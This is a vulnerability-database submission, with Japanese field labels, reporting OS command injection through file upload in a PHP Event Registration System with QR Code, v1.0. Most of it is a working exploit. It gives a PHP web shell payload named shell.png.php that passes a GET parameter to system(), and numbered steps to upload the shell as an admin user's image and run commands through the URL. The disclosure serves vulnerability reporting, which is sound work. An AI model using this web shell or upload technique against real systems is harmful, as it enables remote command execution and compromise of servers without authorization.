| タイトル | OS command injection via File Upload in Event Registration System with QR Code |
|---|
| 説明 | # Exploit Title: Event Registration System with QR Code
# Exploit Author: Krutika Thakur
# Vendor Name: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/14884/event-registration-system-qr-code-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/php/14884/event-registration-system-qr-code-php-free-source-code.html
# Version: v1.0
# Tested on: Windows 10, Apache
Description:-
A OS command injection via File Upload issue in Event Registration System with QR Code App v.1.0 allows to inject OS command injection which can leads to all internal files in the system
Payload: shell.png.php
<?php echo "Shell";system($_GET['cmd']); ?>
Steps:
1) Login as ADMIN
2) Now go to http://localhost/event/admin/?page=user/list and add user
3) Now fill the details and upload a malicious file.
Payload: shell.png.php
<?php echo "Shell";system($_GET['cmd']); ?>
4) Now save the user
5) Open the image in new tab and in the above url type the below command
http://localhost/event/uploads/1669472280_shell.png.php?cmd=whoami
6) As we can see the OS command injection has been executed |
|---|
| ユーザー | lucifoxer001 (UID 33693) |
|---|
| 送信 | 2022年11月26日 15:26 (4 年 ago) |
|---|
| モデレーション | 2022年11月30日 11:50 (4 days later) |
|---|
| ステータス | 承諾済み |
|---|
| VulDBエントリ | 214590 [SourceCodester Event Registration System 1.0 cmd 特権昇格] |
|---|
| ポイント | 17 |
|---|